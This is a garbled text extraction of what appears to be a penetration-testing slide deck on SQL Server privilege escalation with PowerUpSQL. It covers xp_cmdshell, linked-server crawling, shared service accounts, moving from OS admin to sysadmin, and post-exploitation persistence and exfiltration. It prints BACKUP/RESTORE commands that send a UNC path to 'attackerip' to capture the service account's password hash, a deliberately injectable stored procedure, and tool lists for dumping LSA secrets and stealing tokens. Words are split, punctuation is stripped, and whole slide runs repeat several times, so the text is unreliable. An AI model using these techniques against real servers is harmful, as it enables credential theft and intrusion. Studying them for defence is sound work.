LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
